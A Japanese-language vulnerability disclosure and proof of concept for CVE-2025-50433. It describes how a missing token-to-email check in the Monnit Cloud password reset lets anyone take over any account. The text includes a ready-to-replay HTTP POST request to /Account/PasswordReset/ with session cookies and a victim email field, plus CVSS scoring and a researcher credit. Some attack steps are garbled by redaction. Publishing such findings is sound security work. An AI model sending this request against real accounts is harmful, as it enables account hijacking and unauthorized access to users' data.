
# 重大なMonnit Cloudアカウント乗っ取り(CVE-2025-50433)の概念実証 パスワードリセットにおけるトークンとメールの検証欠如を悪用し、攻撃手順、根本原因、および是正策を提供します。
*.imonnit.com 全体にわたる重大な認証脆弱性が存在し、
被害者の操作なしに任意のユーザアカウントの**完全なアカウント乗っ取り(ATO)**を可能にします。
バックエンドはパスワードリセットトークンと対象メールアドレスとの関連付けを検証しないため、 攻撃者は自身の有効なリセットトークンを使用して任意の被害者アカウントのパスワードをリセットできます。
[email protected])を作成する。[email protected])を持っている。 POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (重大)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
パスワードリセットエンドポイントは、リセット操作中に提供された電子メールと同じメールアドレスにリセットトークンが属していることを検証しないため、攻撃者が制御するトークンを使用して任意のパスワードリセットが可能になります。
/Account/PasswordReset/
ベンダー: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor